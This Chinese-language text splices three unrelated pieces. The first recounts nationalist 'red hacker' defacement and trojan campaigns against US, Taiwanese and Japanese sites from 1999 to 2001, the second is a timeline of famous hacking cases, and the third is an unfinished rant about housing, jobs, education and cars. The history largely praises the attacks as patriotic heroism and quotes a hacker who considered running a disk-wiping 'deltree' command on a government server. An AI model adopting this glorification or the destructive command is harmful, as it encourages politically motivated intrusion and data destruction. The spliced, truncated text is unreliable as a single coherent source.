广大网友看到被黑的美国网页后，立刻给予最热烈的掌声和欢呼声鼓励，纷纷留言：“怀着激动的心情向黑客们致敬！”“向黑侠们问声：辛苦了！”“我太佩服和尊敬黑客了！谁在关键时候为民族尽力，谁就是英雄！”。有的将“黑客”称为“红客”，赋予其革命正义的色彩。有的网友迫不及待要拜师学艺，表示“请热爱、拥护祖国的黑客马上传授‘黑’美国佬的方法给本人，并且希望可以同时收我为徒，令我日后也可以为祖国作出贡献”，而立刻也有人跟着表示“算我一个，我M昨天就说我：玩了几年计算机，到报效祖国的时候了。” . “中国黑客紧急会议中心”网页于 5 月 17 日 推出网上民意调查“你对近期中国黑客的行动的看法”，到 20 日晚 11 点共有 717 人表示了自己的态度：① 绝对支持，我想加入行动（占 81% ）；②支持，但不会加入行动（占 13% ）；③基本支持，但在细节上有些意见（占 3% ）；④无所谓（占 0% ）；⑤我觉得这样不太好（占 0% ）；⑥绝对反对（占 1% ）。尽管目前的网上调查不具有统计学层面的科学性与规范性，但毕竟可以利用网络的互动功能最快地了解部分特定社会群体的看法和意向。对于黑客的此次行动，连很多报纸也给予了正面肯定，在报道中称他们是“网络战士”，“网络勇士”，某报纸报道的一个段落标题是：“网络勇士们在这一特定历史时刻，成了比特时代的英雄”。

红色在中国即意味着革命，也体现着胜利。在这次中国黑客对美国网络进行攻击中，为了更突显攻击的正义性，“红客”成为出于政治目的进行攻击的中国黑客的外包装。作为攻击主力的“中国红客网络安全技术联盟”（ H.U.C ， Honker Union of China ）明确提出：应统一“红客”一词的英文名称（ honker ）。他们认为：“英文是通行全球的世界语言，‘红客’一词若能在英文中占有一席之地，这将具有非同寻常的意义！这样红客在世界范围内的交流与应用将变得更加方便；更重要的是，这样做能扩大影响力，增强凝聚力，促进红客文化的形成和进一步的发展。”他们明确提出“红客”的宗旨是：“维护祖国统一，捍卫国家主权”、“一致抵抗外辱，打击反华气焰”、“打击日右，美帝，台独，以及一切敌视我们国家的敌对分子。”

第三次： 1999 年 8 月攻击台湾网络

1999 年 7 月 9 日，李登辉在接受“德国之声”专访时，所提出了所谓“两国论”。公然宣称，台湾当局将两岸关系定位在“国家与国家，至少是特殊的国与国的关系”。台湾当局有关负责人也随声附和，说两岸关系已从“两个对等政治实体”走到“两个国家”，两岸会谈就是“国与国的会谈”等等。台湾当局这些分裂祖国的言论将他们一贯蓄意分裂中国领土和主权、制造“两个中国”、“一中一台”、“台湾独立”的意图暴露无遗。“两国论”顿时导致两岸局势紧张。大陆黑客依靠刚刚对美网络攻击战中总结出的经验，从 8 月 7 日 开始攻击台湾十多个政府网站，台湾黑客随即于 8 月 8 日展开反击，大陆黑客贴“世界上只有一个中国，世界只需要一个中国”，台湾黑客贴“台湾是中国永远分割的一部分”、“你们敢打，我们敢独；大陆黑客贴五星红旗，台湾黑客贴青天白日旗，一时间“山雨欲来风满楼”。香港、台湾报刊纷纷以“两岸黑客狂掀网络战”、“网络大战方兴未艾”、“网络开战：免不了的一场战争”为题，大肆进行报道：“台海两岸军队尚在隔海威吓，按兵观望，民间却已经先行拉开电脑资讯大战的序幕，双方电脑黑客互相攻击对方网站并张贴政治口号，展现实力。”

在大陆黑客的攻击中，台湾“行政院”、“国安局”、“新闻局”、“监察院”、“国民大会”等网站均被攻克。台湾方面指，仅对“国安局”的攻击 3 天内就达 7200 次。大陆黑客除删改网页外，还给许多台湾服务器安装了木马程序，导致不少网站服务器长时间瘫痪。值得一提的是，此次安装的木马程序由美国的 BO 首次改为了大陆黑客自己研发的“冰河”与 NetSpy ，而“木马冰河”也成了大陆黑客最为钟爱的木马程序。 8 月 11 日，台湾“国民大会”网站报警称，网站软、硬件疑遭黑客攻击造成严重毁损，即使是重灌系统也无法恢复。而警方对黑客仅利用软件就可破坏硬件，大感惊讶。在台湾黑客的第一波的反击下，铁道部、中国证监会、陕西科技信息网、浙江平阳国税局网站等篡改网页。随着两岸黑客对攻战规模的发展，大量的非政府网站开始被殃及。参与者非理性的成分越来越大，只要是“黑”下一个对方网站，就被视为胜利战果。这种情况是出于政治目的而实施的黑客攻击最普遍的现象，已超出少数真正意义上的黑客的行径。一直到八月底，两岸的黑客战才暂告一段。后来，台湾黑客扬言要在 十月一日当天大举进攻大陆网站，而大陆黑客则针锋相对地表示，如果这样，将在是 十月十日 坚决反击。

中国大陆黑客与台湾黑客的互攻是一场“持久战”，但凡碰到刺激事件就会引发攻击。如 2000 年 3 月 18 日台湾“大选”结束陈水扁上台的当晚，一些大陆黑客当即进行攻击行动。以下是名叫“天语”的一名黑客的自白：“本人天语，浙江人氏，现外出打工，月薪 800 元人民币，虽不穷困也不不富有，刚好穿暖吃饱，平民 - *民 - 贱民一个，连正规的高中都还尚未读过！此次对台湾的几个站点页面修改纯属发自一时气愤！要分裂我中国，我想每一个中国人对这个观点上的态度和我都该是一样的！尔等现正对我中国站点进攻，昨天竟还有一个“可爱的”所谓的“黑客”竟对我的个人电脑挂带的 HTTPD 产生了兴趣。呵呵。。其 IP 来自 140.123.107.78 。在此想也不用本人来说尔等对我方的进攻之密集！本人现警告之！本人原已停止对台主机的破解，但听闻尔等竟然反攻，并破坏我国几个站点。本人忍耐有限，于昨晚进入尔等国防部的主机。本打算来个 deltree/y c:\ 但想此举必将引起黑客大战！顾及大家皆无利可图，本人最后退出 TELNET 进程并关闭端口，可能也顺手关了 80 端口 , （纯属水平太差！：））现公布屏捕图！望尔等也能息事宁人！！”正是这名“天语”和其他黑客攻陷了台湾“国防部”等多个网站。

2004 年台湾“大选”后，台湾情治部门透露， 3 · 20 “大选”刚结束不久，大陆黑客竟突破重重防火墙，侵入“总统府”和“国安会”内部网络系统，窃取并下载机密文件。近年来，台湾媒体屡屡报道“大陆网军入侵台湾”。两岸长期僵持的局面，决定了两岸黑客互相攻击的长期态势。

第四次： 2000 年 1~2 月攻击日本网络

2000 年 1 月 21 日 ，日本最高法院无视历史事实，悍然判决参加过当年南京大屠杀的老兵东史郎见证大屠杀的诉讼败诉； 1 月 23 日，右翼势力在大阪国际和平中心集会，公然否定南京大屠杀的历史事实。这再次激起中国黑客的民族主义情绪，明确提出要进行一场网上的“新抗日战争”，发动了对日本网站的攻击。被篡改的日本网页上出现的文字如“不肯正视历史真相的日本人是亚洲之耻”明显表现出此次攻击的政治性。

在这次攻击中，有一个自称“中国极右翼抗日联盟”（其当时设立的网站网址为： http://www.bsptt.gx.cn/public/badboy/hack/ ）的黑客组织最为显眼，从 1 月 24 日 到 2 月 13 日 ，他们对大约 30 个日本网站发动攻击，其中包括日本政府科技厅、总务厅及《每日新闻》， NHK 、冲绳邮政总局、 JVC 公司等各类网站。该联盟网站张贴了极刺激的《致日本政府的公开信》，并表明联盟宗旨是“对日本少数疯狗在网络里进行猛烈的打击”，联盟组成是“一切具有强烈爱国心的中国网虫”。该联盟网页上还提供了 300 多个日本政府的网址、 100 多名日本议员的电子邮件地址及十几种最有效的黑客进攻工具，并附有详细说明如何进攻日本网站。 2 月 18 日 ，《电脑报》记者通过 ICQ 采访了一位自称进行攻击的名为“ ROOT ”的黑客，并对他进行了技术甄别，确认他具有攻击日本网站的能力。 ROOT 承认，日本总务厅、统计厅、科技厅等网站的瘫痪都是他所为（后据日本共同社报道，日本警视厅在调查黑客入侵事件中所得资料显示的时间，与自称攻击网站的黑客 ROOT 所讲述的入侵时间一致，且入侵时使用的服务器也和总务厅的一致）。他说，发动对日本网站的攻击，是因为不满日本极右翼势力在大阪集会否定南京大屠杀等历史事实。“所有一切都是我一人所为，我认为对付小日本我一个人就够了。我只觉得做了一件中国人应该做的事情，换成其他人也会这样做。”当记者问他以后是否还会采取类似行动时， ROOT 表示如有必要，还会照做。他说要日本政府和传媒不要低估这次行动，以为只是一种“恶意行为”，“我希望他们能把此事与大阪事件联系起来，给日本鬼子一个警告”。日本各大报刊、电视台均将中国黑客的攻击事件列为头条新闻，并进行追踪报道。

第五次： 2001 年攻击日本网络

跨入新的世纪后之后，三菱车事件、日航事件、教科书事件、《台湾论》事件、小泉参拜靖国神社等一系列事件严重影响了中日友好关系。伴随这些事件，一再被激怒的中国黑客，持续地对日本网站进行了攻击。日本政府官员当时不得不承认，由于抗议者越来越喜欢通过互联网发泄不满，使日本网站受到政治动机袭击的事件急速增加， 2001 年前五个月已出现 650 起类似的网站被黑事件，而 2000 年一年仅发生了 63 起以政治为目的的黑客攻击事件。

首先是 2 月的攻击波。“中国红客网络安全技术联盟”（ H.U.C ）宣布， 2001 年 2 月 16 日 18 点开始对日本施行一个星期的攻击行动，包括政府网站、大型网站和其他重要的网站、重要 dns 系统。在随后的 10 多天中，日本 70 多家企业的网站表示被中国黑客侵入。这些企业遍及日本全国，多属民间企业，包括著名的日本电信公司 NTT 、西日本印刷公司大日本印刷，日本精工的一家子公司、日本短波广播等。被黑客篡改后的网页，大都更换成了中国国旗。

由于教科书事件紧随而来的是三月攻击波。这次日本网站面临的是中国、韩国两国黑客攻击。如当时日本教育省、文化省、体育及科技省的官方网站遭到来自韩国的黑客攻击而不得不关闭，最终日本政府不得不出面敦促韩国政府采取措施阻止黑客再次进行攻击。

在小泉 8 月 13 日 参拜靖国神社后， 8 月的攻击波来得更为猛烈。中国的黑客在获悉新闻后，即刻采取行动，更换了部分日本政府站点的主页内容，以示抗议。中国黑客组织在声明中表示：小泉参拜靖国神社的举动严重伤害了亚洲各国人民尤其是中国人民的感情，加之此前的教科书事件等，令他们非常愤怒，为此，决定用攻击日本政府网站的方式，表达他们的强烈不满。其实，中国红客大联盟早已讨论，一旦 8 月 15 日小泉参拜，将对日本网络采取何种攻击行动，没想到小泉提早参拜，因此红客大联盟成员也提前行动。

8 月 13 日 当天下午 4 时许，日本气象厅网站服务器首先受到中国黑客的攻击，其后，日本物质评估研究机构、日本战略物质研究中心、日本防御系统研究会、日本情报大会服务中心、日本消防厅、日本防卫设施厅、日本通讯研究实验室、日本议员网站等大批政府站点也受到攻击。 8 月 14 日凌晨，红客大联盟发出了《对日本采取网络打击的声明》，内中写道：“日本首相小泉不顾全亚洲人民的抗议和日本国内祈求和平的声音，于昨日下午公然参拜了象征日本军国主义的靖国神社。日本领导人的这一错误举动严重地伤害了亚洲各国人民，尤其是受害最深的中国人民的感受。加之教科书事件等斑斑劣迹更是体现出日本当局对当年的错误毫无悔改之意。红客大联盟在得到此消息的的第一时间便召集了部分成员对此突发事件商讨对策。最终决定在我国政府还没有对日本提出抗议之前用我们所擅长的，表达我们网络时代青年一群对日本新政府的严正抗议和日本领导人的强烈不满。红客大联盟 ( http://www.RedHacker.org ) 在此次紧急行动中对以下的日本政府站点进行了主页替换。这和我们致力于推行的红客精神并不矛盾。红客大联盟对此件事情的发生表示遗憾，并将对以下所列举的受到的攻击的站点负责。历史不容忽视，事实岂能篡改，反击方能赢尊重，发展才是硬道理！”

第六次： 2001 年 4 月攻击美国网络

2001 年 4 月 1 日，美国军用侦察机将中国战机撞毁，导致飞行员王伟坠海死亡。这一事件在中国国内引起民众极大的愤慨，而在中美之间立刻造成布什新政府与中国关系紧张的局面。尽管 4 月 11 日 ，中国方面已同意美方机组人员先行返国，但事件尚未得到完全解决，两国间的气氛依旧剑拔弩张。从 4 月初开始，中美两国的黑客已经展开相互攻击。如美国黑客组织 poizonB0x 便是攻击中国网站的主力，而一个名为 pr0phet 的黑客则更是明确地说：“我一开始只是随机挑选一些网站作为攻击目标，不过现在我则主要攻击以 .edu.cn 和 ac.cn 结尾的网站，或者只是以 .cn 结尾的网站，都会成为我的攻击目标。”在这种气氛和情况下（ 5 月 8 日又逢中国驻南使馆被炸两周年），中国黑客在 4 月 30 日 至 5 月 8 日打响了大规模的“第六次卫国网络战”。对于这次中美黑客大战的“战绩”，不同媒体的报道有很大出入，据“中国红客联盟”负责人称，真正被攻破的美国网站到 5 月 7 日 为止有 1600 多个，其中主要的网站 ( 包括政府和军方的网站 ) 有 900 多个。而中国被攻破的网站有 1100 多个，主要网站有 600 多个。实际上，任何一次黑客战争既不可能事先公开“宣战”，更不可能有“终战”的截止日期。

这次中美黑客大战有以下特点：

1 、中国黑客的攻击事出有因

在中国黑客的这次行动中，“中国红客网络安全技术联盟”（简称“中国红客联盟”， HUC ）是最瞩目的攻击主力，它使“红客”这一称谓再次叫响。其负责人 Lion 在 2000 年 12 月 1 日就提出建议：“统一“红客”一词的英文名称（ honker ）。“红客”一词若能在英文中占有一席之地，这将具有非同寻常的意义！这样红客在世界范围内的交流与应用将变得更加方便；更重要的是，这样做能扩大影响力，增强凝聚力，促进红客文化的形成和进一步的发展！”也就是说中国黑客试图通过“红客”名称的确认，来赋予自己在一种特定情况下所作所为的正面形象。中国黑客涂改美国网页尽管也有以谩骂方式来泄愤，但主流是中国国旗、中国国歌和“伟大的中华民族万岁！”、“美国必须对撞机事件负完全责任”、“抗议美国向台湾出售武器，破坏世界和平！”等口号，实践着“维护祖国统一、捍卫国家主权、一致抵抗外辱、打击反华气焰”的行动宗旨。

2 、中国黑客的攻击具有群体规模

“中国红客联盟”、“中华黑客联盟”和“中国鹰派联盟”是攻击美国网站的主力，由于以往通过各种形式奠定的组织基础，因此得以在这次攻击行动中发挥群体力量，并带动了一大批临时参战的“菜鸟”（即技术生疏的新手）。如 4 月 30 日晚 7 点，“中国红客联盟”召开了“攻击美国网络动员大会”，并提供了更换美国网页的专用数据包；再如 5 月 4 日晚，中国黑客集中力量攻击白宫网站，据称参与人数有 8 万之众，事后白宫网站的新闻负责人吉米承认“大量数据同时涌入，堵塞了白宫与其互联网服务提供商的连接通道”。中国黑客万众一心的行动并且其间的出色协调，使得美国方面怀疑这次中国政府如果说没有背后支持，至少也是默许的。加拿大军事评论家、汉和情报评论高级分析员平可夫在香港《亚洲周刊》（第 19 期， 5 月 13 日）撰文称此次中国黑客的攻击为一场“新人民战争”，而这场战争的主体往往是可以称为“信息战网络战民兵”的庞大群体，武器是计算机、杀伤性火力构成是知识和技能，战场便是信息网络。

3 、中国黑客群体由年轻人组成

据媒体报道，“中国鹰派联盟”负责人老鹰，“中国红客联盟”负责人 lion，其专业还不是计算机。 Bkbll 称“中国红客联盟”成员的平均年龄并不是媒体报道的 23 岁，而是更年轻，同时注册成员的 65% 是在校大学生。中国互联网信息中心（ CNNIC ）历次调查显示， 30 岁以下的青少年占全体网民的绝大多数。如最近一次调查显示（截止日期为 2000 年 12 月 31 日）， 8 个年龄段中， 18 至 24 岁占 41.18% ， 25 至 30 岁占 18.8% ， 18 岁以下占 14.93% ，也就是说， 18 至 30 岁年龄段的用户占到 2250 万总体的 75% 。今年中国网络用户预计将突破 3500 万， 2005 年将达到 2 亿，占全体国民的 15% 。从发展看，如此规模巨大的中国青年网络用户群体的网络行为，今后不论是对内还是对外，都将产生更大的效应。

这一代人（ 20 世纪 70 、 80 年代生人）成长的环境与老一代完全不同，拥有的知识与技能完全不同，价值观也发生了很大变化。但“中国鹰派联盟”在致美国总统公开信中一段话是颇为意味深长的：“过去短短的一百年里，中国人的日历充满了太多的苦难和积怨。为我们抚慰感伤的人，我们永远感激；为我们伤口撒盐的人，我们更不会忘记。我们的下一代，已经在肯德鸡、麦当劳中长大，每月去看一部制作精美的好莱坞电影，也已经成为很多中国人的习惯。但有趣的是，正当我们的前辈们为此忧心重重的时候，把他们敲醒的却往往还是你们自己。”

60年代早期

拥有巨型计算机的大学电脑设施－如麻省理工学院的人工智能实验室成 为黑客初显身手的舞台。最初，“

黑客” （h_acker）是一个褒义词，指的是那 些尽力挖掘计算机程序的最大潜力的电脑精英。 　

1983年

美国联邦调查局首次逮捕了6名少年黑客，他们因其所居住的地区密尔沃 基电话区号是414，而被人称作“414黑客”。 这6名少年黑客被控侵入60多台电脑，其中包括斯洛恩－凯特林癌症纪念中心和洛斯阿拉莫斯国家实验室。最后， 一名黑 客因其所作证词而豁免无罪，另外5人被判缓刑。 　　

1984年 　

艾里克·科力在纽约创办黑客杂志《2600：黑客季刊》。该杂志立即成为黑客交换信息的重要场所。 　　

1985年 　

地下记者“塔兰王”和“闪电骑士”在圣路易创办电子杂志《弗里克》 （Phrack），专门介绍攻击计算机的知识。 　

1987年

17岁的高中缀学生赫尔伯特·齐恩（被执法当局称作“影子鹰”）承认 侵入美国电话电报位于新泽西州贝特敏斯特市 的电脑网络。美国联邦执法部门指控他（在芝加哥郊区的卧室里操纵一部电脑）闯入美国电话电报公司的内部网络和中心 交换系统。齐恩是美国1986年“计算机欺诈与滥用法案” 生效后被判有罪的第一人。他是因为在一处电子公告栏中吹嘘自 己攻击过美国电话电报公司的计算机系统而被逮捕的。 　　

1988年

康奈尔大学研究生罗伯特·莫里斯（22岁）向互联网上传了一个“蠕 虫”程序。这个程序是他为攻击UNIX系统的缺陷 而设计的，能够进入网络中的 其他电脑并自我繁衍，上网后迅速扩散感染了6000多个系统－几乎占当时互联 网的1／10。 它占用了大量的系统资源，实际上使网络陷入瘫痪。莫里斯很快 被执法人员逮捕，专家称他设计的“蠕虫”程序造成了15 00万到1亿美元的经济损失，但是他否认自己有这样的动机。他面临最高5年监禁和25万美元的罚 款，但是最终仅被判3年 缓刑、做400小时社区服务和1万美元罚款。 同年，在发现有黑客入侵军事网（Milnet）的一部联网电脑之后，美国国防部切断了非保密的军事网与阿帕网-即早期 的互联网之间的物理连接。1989年 美国加利福尼亚大学伯克利分校系统管理员克利弗·斯托尔发现了5名西德电脑间谍入侵美国政府和大学电脑网络的有 组织活动并进行了深入的调查。 结果这5名西德人最终因间谍罪被逮捕起诉，其中3人被控向苏联克格勃出售他们所获得的情报，罪名成立。但是实际上他们都没有度过一天的铁窗生涯。斯托尔后来出版了《布谷鸟之卵》一书详细讲述他追踪黑 客的故事。 同年，凯文·米特尼克因从DEC公司盗窃软件和从MCI公司盗窃长话代码 而被判有罪。他在监狱中关了一年，出狱后被禁止使用或与其他黑客联系。 　　

1990年

“末日军团”（美国南方的一个黑客组织）的4名成员因盗窃南方贝尔公司的911紧急电话网络的技术秘密而被逮捕。 4名黑客中有3人被判有罪。 同年，联邦特工处在14个城市发动“阳光罪恶行动”对黑客实施严打。 　　

1991年

美国警方在达拉斯以拥有一部偷窃来的汽车逮捕了简斯汀·特纳·彼得 逊，随后搜查到的电脑文件显示他曾入侵 TRW 公司的电脑网络。后来他帮助联 邦调查局和联邦特工处调查计算机犯罪活动。据报道他协助调查人员办过米特尼克的案子。 1993年10月他突然失踪，不久当局宣布他为逃犯。1994年他因参与凯文·波尔森案而重新被捕（见1993年）。 同年，国会总审计署宣布在海湾战争期间，几个荷兰少年曾侵入国防部 的计算机，修改或复制了一些非保密的与战争 有关的敏感情报，包括军事人 员、运往海湾的军事装备和重要武器装备开发情况等。 　　

1992年

“欺骗大师”（纽约市一个少年黑客组织）因入侵美国电话电报公司、 美国银行和TRW公司及国家安全局的计算机系 统而被判有罪。警方在这起案件 中使用了窃听装置。

1993年

凯文·波尔森利用计算机破坏洛杉矶市的三家广播电台的比赛被起诉。 据悉波尔森一共骗得了两辆保时捷汽车、 2万 美元现金和两次前往夏威夷的旅 行。他被控与另外两名黑客罗纳德·奥斯汀和简斯汀·特纳·彼得逊合谋控制电台的电话 线路，只让他们的电话能够打进去，从而“赢得”大奖。 　　

1994年

格里菲斯空军基地和美国家航空和宇宙航行局的电脑网络受到两名黑客 的攻击。苏格兰场经过调查逮捕了代号“数据 流”的16岁英国黑客。另一名黑 客Kuji至今逍遥法外。同年，英国《独立报》报道，英国电信一名临时雇员用一个很容易就得到的密码发现了英国女王、梅杰首相和其他几位军情五处高官的电话号码。所有 这些号码都被公开在互联网上。后来，这篇报道的作者承认为英国电信工作并偷窃了上 述电话号码的就是他自己。 黑客向安全专家下村孜位于圣地亚哥超级计算机中心的计算机发动全面 攻击。下村后来参与了对米特尼克的追踪行动。 　　

1995年

米特尼克被逮捕。他被指控闯入许多电脑网络，偷窃了2万个信用卡号和 复制软件。米特尼克被囚禁到1999年3月，等 待审判。他承认自己犯有7项严重 罪行。随后他又被囚禁了10个月并于2000年1月获释。未得到警官批准，他在2003年以前 不得使用电脑。 俄罗斯黑客列文（30岁）在英国被捕。他被控用笔记本电脑从纽约花旗 银行非法转移至少 370万美元到世界各地由他 和他的同党控制的账户。列文后 来被引渡到美国，被判处3年监禁和归还花旗银行24万美元。 　　

1996年

代号为 Johnny的黑客向大约40位政治家、企业领导人和其他个人发送邮件 炸弹，一个周末便制造了高达2万条垃圾邮件。这名黑客迄今仍逍遥法外。1997年 网络解决方案公司管理的InterNIC域名注册网络受到竞争对手的攻击。 AlterNIC公司的管理员后来承认他设计了一个 破坏性的程序，将InterNIC网站 的访问者“劫持”到自己的网站上。

1998年

美国防部宣布黑客向五角大楼网站发动了“有史以来最大规模、最系统 性的攻击行动”，打入了许多政府非保密性的 敏感电脑网络，查询并修改了工 资报表和人员数据。不久，警方抓获了两名加州少年黑客。三个星期后， 美国 警方宣布 以色列少年黑客“分析家”被抓获。 麻萨诸塞州伍切斯特机场导航系统因一名少年黑客入侵而中断6小时。 声称属于黑客组织“下载大师”的黑客攻入五角大楼网站，窃取了机密 软件，从而获得了对美国一颗军事间谍卫星的 控制权。黑客威胁说要将软件卖 给恐怖分子。五角大楼随后否认这套软件是机密的，能够让黑客获得对卫星的控制权，但 是承认一个保密级别较低的网络被黑客成功打入

1999年5月－6月

国参议院、白宫和美国陆军网络以及数十个政府网站都被黑客攻陷。在每起黑客攻击事件中， 黑客都在网页上留下 信息，但是这些信息很快就被擦 去。黑客在美国新闻署网站留下的信息最引人注目：“水晶，我爱你。”署名为：Zyklo n。 　　

1999年11月

挪威黑客组织“反编译工程大师”破解了DVD版权保护的解码密钥。该组 织编制了一个DVD解码程序公布在互联网上， 这个举动引发了一系列诉讼案。 　　

2000年2月

在三天的时间里，黑客使美国数家顶级互联网站－雅虎、亚马逊、电子 港湾、CNN－陷入瘫痪。 黑客使用了一种称作 “拒绝服务式”的攻击手段，即 用大量无用信息阻塞网站的服务器，使其不能提供正常服务。

中国人都在上的四大当
第一大当：房产
　　买房意味着什么？意味着你拥有了一个属于自己的房子。是的，你是这样以为，但是在中国你并无法拥有这个房子，只是租给你而已。因为中国

只有把土地使用权 租借给你70年（有的地方是50年）。而房子通常情况下30年左右就会遇上拆迁或者旧房改造。也就是说你花了买房的钱，却只能得

到租房的实际效果。当然这 还不是最坏的。最坏的是，当几十年后你发觉上当了！有一群流氓冲进你用一辈子积蓄买下的房子，画上一个大大的拆字

！然后把你的家当全部当垃圾一样的仍出门 外，不顾你的苦苦哀求，甚至还在报纸上给你按一个钉子户的臭名，任大众辱骂的时候你就会知道什么叫

做绝望！
　　形容中国的房地产有一个很有名的笑话是这样写的：
　　以前，有个地主有很多地，找了很多长工干活，地主给长工们盖了一批团结楼住着，一天，地主的谋士对地主说：东家，长工们这几年手上有点

钱了，他们住你的 房子，每月交租子，不划算，反正他们永远住下去，你干脆把房子卖给他们起个名堂叫做-----公房出售！告诉他们房子永远归他

们了，可以把他们这几年攒的 钱收回来，地主说：不错，那租金怎么办？谋士说：照收不误，起个日本名儿，叫物业费！地主很快实行了，赚了好多

钱，长工们那个高兴啊！
　　过了几年，地主的村子发展成城镇了，有钱人越来越多，没地方住，谋士对地主说：东家，长工们这几年手上又有钱了，咱们给他们盖新房子，

起个名堂叫做旧城改 造，他们把手上的钱给我们，我们拆了房子盖新的，叫他们再买回去，可以多盖一些卖给别人，地主又实行了，这次，有些长工

们不高兴了，地主的家丁派上用途 了，长工们打掉牙只好往肚子里咽，地主又赚了好多钱。
　　又过了几年，地主的村子发展成大城市了，有钱人更多了，地主的土地更值钱了，谋士 对地主说：东家，咱们把这些长工的房子拆了，在这个地

方建别墅，拆出来的地盖好房子卖给那些有钱的大款还能赚一笔，地主说：长工们不干怎么办？谋士说：咱 给他们钱多点儿，起个名堂叫货币化安置

，咱再到咱们的猪圈旁边建房子，起个名堂叫经济适用房，给他们修个马车道让他们到那边买房住，地主说：他们钱不够怎 么办？谋士说：从咱家的

钱庄借前给他们，一年6分利，咱这钱还能生钱崽，又没风险，地主又实行了，长工们拿到钱，地主的经济适用房到现在才建了一间，长工 们只好排

队等房子，直到现在，还等着呢------
　　于是，长工们开始闹事了，地主有点慌，忙问谋士怎么办？谋士说：赶紧通知长工们，房子要跌价了，别买了，租房住吧，正好把我们的猪圈租

给他们，结果，这么多年后，长工们的钱全没了，还在租房住，直到永远！
　　这个笑话虽然有点夸张，但实际上这何尝又不是事实呢？有人说既然如此？为什么中国人还要买房？疯了一样的买？为什么？还不是愚民教育的

结果，就好象60 年代，鼓吹人们必须购买三大件：手表、缝纫机、自行车才算是成功人士才可嫁人娶妻。70年代鼓吹人们必须购买新四大件：电视，

冰箱，洗衣机，装电话才算是 出人头地才可娶妻生子一样，记得当年装电话可是要几千块钱一部啊（人均收入不到200的小城），而北京上海更有上

万一部的时候，还得排队买号搭人情，和今 天的买房又何其相似？
　　而今天所有的狗屁学者又开始了这一套愚弄百姓的旧招：白领一族新标准，成功人士新选择X环X路小户型，X环X路商 住型。收了你几十万后，还

得每个月收你租金（新物业费），银行利息，以及各种巧立名目的加息、政策等等等等。总之不怕你不被整死，就怕你死得不够惨！老百 姓咋就怎么

乐于上当，而且百上不厌呢？我真是气得浑身都湿了！
第二大当：就业
　　当有人终于开始感叹：当年当知青 的时候，当有人下岗之后感到没有生路，只能静坐抗议却无人理会，只能沦落街头还被人编首歌嘲笑着人生豪

迈，重头再来的时候。你可曾想过！他们也曾经和今天 的白领一样风光！他们的收入和地位也曾经让周围的人艳羡不已？你可曾想过20年后的今天！

你一样会和他们一样沦落街头，众叛亲离？！
　　有人说嘿！你不知道有失业保险，养老保险，XX保险么？呵呵，我在北京漂泊N年，交了无数保险大概有好几万吧，但失业的时候跑断腿也没人给

我啥保险，反而很 多保险都被冻结了说我交得断断续续的，我简直又气得……这还不算，你以为你到了60岁真的就可以拿到养老保险了吗？天上又不

会掉钱！今天的老年人拿的退休 金是我们在挣！而今天30-40岁的人通常都有好几个兄弟姐妹！意思就是，今天的老年人能在60岁拿到养老保险是因

为有5个人供一个老人！而我们这一代老 去之后则是一个人供我们两个老人！钱从哪里来？没得来！您要是能活到90岁估计能领到一些养老保险，嘿

保重吧您。然而即使是这样，家长们还是疯了一样的把 孩子往各种企事业国有单位里送，我身边就经常有这样的例子。我老家一个远房亲戚，找关系

拖朋友，花了七万块钱通过公开招聘把儿子送进了交警队，干上合同制 的police。一个月拿800块。结果第三年被竞争上岗给刷下来了。一家人哭哭

啼啼，我说刷了好，你上那班一辈子挣不回那七万，赶紧先洗洗睡，改明再凑 点钱做小生意去吧！没准还能赚点。
　　当年我毕业的时候，我妈也是领着我抱着钱，把我往XX部送。我一看负责招工那人那德行，就忍不住的恶心，再一看薪水，妈呀，我这不是白干

10年不吃不喝才拿回成本。所以我私下威胁了那家伙一把，吓得那个大腹便便的X科长 再也不敢招收我。我才得已：离家出走。
　　我就想不明白？中国人咋就这么傻？这么迷信国字呢？醒醒吧，思维正常一点行不？做事之前自己算算合算不合算成不？
　　还有那些年纪轻轻的小白领们，找工作最好把薪水要高点，别要医疗保险和啥保险，然后自己把钱存起来最保险，将来用得着。

第三大当：教育
　　一张文凭值多少钱？一张文凭值多少钱？一张文凭值多少钱？印刷成本两块钱顶了天了。一个老师工资多少？嘿，两个学生的学费足够一学期了

！一个班的书本印刷多少钱？两个学生的足够了！一个班房租多少钱一学期？嘿嘿两个学生足够了。 嘿！中国教育你凭啥收那么多钱！？
　　嘿！百姓们！我们为啥要上当？因为从小统治阶级就告诉我们考上秀才才光荣。哦对不起我说错了，是考上大学才光荣。但老百姓从来不去想一

想为什么光荣？为什么光荣…… 大学秀才又怎样还不是废物！
　　你知道你的孩子是什么人在教么？在中国一般是无法适应社会的人才会沦为一个教师，举个例子。前段时间我因为一个项目的关系，找了几个大

学的硕士生做程 序。结果有几个人笨得很，完全不给你考虑，非得你守着才干活，而且给个文件明显有一个错别字，也不给改，等你发现了还跟你较

真，是这不是他的错，是你给的 就是错的。一点责任感，一都不会考虑究竟是为了做事而做事还是为了做好一件事而做事。我还是很心平气和的给他

们讲道理：你们必须学会为别人思考，思考别人 想要什么结果再去做事情。否则无法在社会上生存。结果那几个说：我们才不要去社会上，我们考试

成绩好得很，学校要我们留校做老师。再说了本来我们就没什么 错，你怎么安排我们怎么做，你不安排我们就不做。这是我们的尊严和原则。我说：

如果你去守门，老板没安排你下班的时候锁好仓库你就不锁了吗？您心寒吗？以 后您的孩子就是在这样的人的指导下学习和成长。您放心么？
　　难怪现在读大学的同居，逃课，打架，自杀…… 但家长们还是愿意花钱把孩子送进学校去，而且是花一辈子的钱。

第四大当：买车
　　中国人疯了吗？买车？为什么要买车？？？当然您有了钱花不光了，您爱怎么买怎么买，买车买房，反正油价怎么涨你也花不完钱，房子要拆迁

你也不心疼。但是大多数老百姓呢？
　　我以前有个同事住北二环，公司西直门那里。每天坐地铁上班最多半小时。可非得买一二手夏利，每天早上8点开始在路上堵着，然后一点一点的

挪到公司。嘿， 一个月停车费都不少。可人家就觉得开了车自己身份高级一点。别说开个夏利，就是开个奥迪我也没见谁对谁三磕九拜。除了显得自

己比别人傻一点外完全没有别的 作用。
　　还有一次，我遇见一个月收入才4000的小姑娘，在计划贷款买车。于是我就问她：小姑娘，你又没做生意，自己按时上班，地铁又方 便，买车干

什么呢？想了半天，实在估计也想不出什么理由来了就说：有时候去超市买东西吧，打车又觉得近了点不划算，走路又远了点。所以自己开车去了！

听得 我差点没恶心死。你开车去超市买个方便面不觉得恶心么？装备了大哥大去拣垃圾，也是拣垃圾的！别以为买了车能证明什么。
　　比如我现在自己 做生意，很忙，一天大概要跑4-5个地方，见很多客户。但我就不买车，为什么？我打车随招即来，打完就走，不用担心停车没

